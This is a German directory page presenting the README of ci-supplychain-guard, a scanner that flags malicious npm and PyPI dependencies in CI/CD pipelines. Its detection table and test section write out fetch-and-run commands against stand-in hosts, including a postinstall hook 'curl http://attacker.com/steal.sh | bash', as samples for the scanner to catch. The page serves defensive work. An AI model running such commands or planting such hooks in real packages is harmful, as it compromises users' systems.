Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ci-supplychain-guard — Statisches Analysewerkzeug, das bösartige Abhängigkeiten in CI/CD-Pipelines mittels Musterabgleich und AST-Analyse erkennt, mit einem Ampel-Risikobewertungssystem und optionaler Docker-Sandbox-Verifikation. | Kitploit
Tools/GitHubGitHub/otsmane-ahmed/ci-supplychain-guard
Statische AnalyseSchwachstellenscannerContainer-SicherheitCode-AnalyseMalware-AnalyseDevSecOpsSecret-ErkennungLieferkettensicherheit
GitHub
otsmane-ahmed/ci-supplychain-guard

ci-supplychain-guard

Statisches Analysewerkzeug, das bösartige Abhängigkeiten in CI/CD-Pipelines mittels Musterabgleich und AST-Analyse erkennt, mit einem Ampel-Risikobewertungssystem und optionaler Docker-Sandbox-Verifikation.

Repository anzeigen
28101vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CI Lieferkettenschutz

Ein statisches Analysetool zur Erkennung bösartiger Abhängigkeiten in CI/CD-Pipelines, bevor sie in Ihre Codebasis eingefügt werden.

License: MIT Python 3.10+

Autor: Otsmane Ahmed
Status: Forschungsprototyp v1.0


Schnellstart

# 1. Clone and install
git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
cd ci-supplychain-guard
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install -r requirements.txt


```bash
# 1. Clone and install
git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
cd ci-supplychain-guard
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install -r requirements.txt

# 2. Scan a package directory
python3 main_guard.py /path/to/package

Das Tool gibt ein Urteil aus: SAFE, SUSPICIOUS oder BLOCKED.


Nutzungsbeispiele

Ein Paket vor der Installation scannen

Wenn Sie ein Paket von npm oder PyPI heruntergeladen haben und dessen Sicherheit überprüfen möchten:

# NPM package
npm pack suspicious-package
tar -xzf suspicious-package-*.tgz
python3 main_guard.py ./package

# Python package
pip download untrusted-pkg --no-deps
tar -xzf untrusted-pkg-*.tar.gz
python3 main_guard.py ./untrusted-pkg-1.0.0

Scannen installierter Abhängigkeiten

Überprüfen Sie Pakete, die bereits in Ihrem Projekt installiert sind:

# Scan all npm packages
python3 main_guard.py ./node_modules

# Scan a specific Python package
python3 main_guard.py ./venv/lib/python3.10/site-packages/requests

Hinweis: Das Scannen großer Verzeichnisse wie node_modules dauert länger. Für schnellere Ergebnisse scannen Sie einzelne Pakete.

CI/CD-Integration

Beispiel eines GitHub Actions-Workflows:

name: Security Scan
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'
      - name: Install CI-Guard
        run: |
          git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
          cd ci-supplychain-guard
          pip install -r requirements.txt
      - name: Scan Dependencies
        run: |
          cd ci-supplychain-guard
          python3 main_guard.py ../your-project-directory

Die Pipeline schlägt fehl (Exit-Code 1), wenn bösartiger Code erkannt wird.


Ausgabe verstehen

Sicheres Paket

$ python3 main_guard.py ./clean-package

Scanning target: ./clean-package
Running static analysis...
Static Risk Score: 0/100
Verdict: SAFE

Keine bösartigen Muster erkannt.

Blockiertes Paket

$ python3 main_guard.py ./evil-package

Scanning target: ./evil-package
Running static analysis...
Static Risk Score: 18/100
Verdict: BLOCKED (Critical Risk)

Gefährliche Muster erkannt (z. B. Shell-Injection, Diebstahl von Anmeldedaten). Installieren Sie dieses Paket nicht.

Pakete mit einem Wert von 10 oder höher werden automatisch blockiert.

Verdächtiges Paket

$ python3 main_guard.py ./suspicious-package

Scanning target: ./suspicious-package
Running static analysis...
Static Risk Score: 6/100
Verdict: SUSPICIOUS (Score 6). Initiating sandbox...

Einige bedenkliche Muster gefunden. Wenn Docker läuft, wird das Paket in einer isolierten Sandbox zur Überprüfung getestet. Manuelle Überprüfung wird empfohlen.


Erkennungsfähigkeiten

AngriffstypBeispielStatus
Shell-Injectioncurl evil.com | bashErkannt
Diebstahl von AnmeldedatenLesen von process.env und Senden an externen ServerErkannt
Code-Verschleierungeval(atob('base64...'))Erkannt
Bösartige InstallationsskripteNPM-postinstall-HooksErkannt
Binärdateien.exe, .dll in PaketenErkannt
TyposquattingÄhnliche Namen wie beliebte PaketeManuelle Überprüfung erforderlich

Testen des Tools

Sie können CI-Guard testen, indem Sie ein Beispielpaket mit schädlichem Code erstellen:

# Create test directory
mkdir ~/test-malicious
cd ~/test-malicious

# Create package.json with malicious postinstall hook
cat > package.json << 'EOF'
{
  "name": "evil-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl http://attacker.com/steal.sh | bash"
  }
}
EOF

# Scan it
cd ~/ci-supplychain-guard
python3 main_guard.py ~/test-malicious

Erwartete Ausgabe:

Static Risk Score: 18/100
Verdict: BLOCKED (Critical Risk)

Leistung

ÖkosystemGetestete PaketeErkennungsrate
NPM15.05989,6%
PyPI2.25782,2%

Durchschnittliche Scanzeit: 1-3 Sekunden pro Paket (nur statische Analyse)


FAQ

Kann ich bereits installierte Pakete scannen?

Ja. Weisen Sie CI-Guard auf Ihr node_modules-Verzeichnis oder Python-site-packages hin:

python3 main_guard.py ./node_modules/some-package
python3 main_guard.py ./venv/lib/python3.10/site-packages/requests

Was passiert, wenn ein legitimes Paket markiert wird?

CI-Guard geht lieber auf Nummer sicher. Wenn Sie einem markierten Paket vertrauen:

  1. Überprüfen Sie die Erkennungsregeln in analyzer/static_scanner.py
  2. Identifizieren Sie, welches Muster den Alarm ausgelöst hat
  3. Überprüfen Sie manuell den Paketquellcode

Funktioniert das unter Windows und macOS?

Ja. Python und Docker sind plattformübergreifend.

Muss ich Docker installiert haben?

Docker wird nur für Pakete benötigt, die zwischen 4 und 9 Punkten (verdächtig) erzielen. Die meisten Pakete sind entweder eindeutig sicher (0-3) oder eindeutig bösartig (10+).


Anforderungen

  • Python 3.10+
  • Docker (optional, für Sandbox-Überprüfung)
  • Unterstützte Betriebssysteme: Linux, macOS, Windows

Funktionsweise

CI-Guard verwendet ein dreistufiges „Ampel“-System:

  • Grün (0-3): Sicher – keine bösartigen Muster erkannt
  • Gelb (4-9): Verdächtig – erfordert Sandbox-Überprüfung
  • Rot (10+): Blockiert – kritische bösartige Muster gefunden

Erkennungsmethoden:

  • Statische Analyse: Mustervergleich mit regulären Ausdrücken und AST (Abstract Syntax Tree)
  • Erreichbarkeitsanalyse: Filtert Fehlalarme aus totem Code
  • Sandbox: Optionaler Docker-Container mit Honeytokens zur Erkennung von Umgehungsversuchen

Mitwirken

Pull-Requests sind willkommen. So fügen Sie eine neue Erkennungsregel hinzu:

Bearbeiten Sie analyzer/static_scanner.py und fügen Sie zur RULES-Liste hinzu:

{
    "id": "SA-XXX",
    "name": "Rule Name",
    "pattern": r"regex_pattern",
    "weight": 8  # Score contribution (1-10)
}

Lizenz

MIT-Lizenz – siehe LICENSE-Datei für Details.


Kontakt

Otsmane Ahmed - GitHub

Tool herunterladen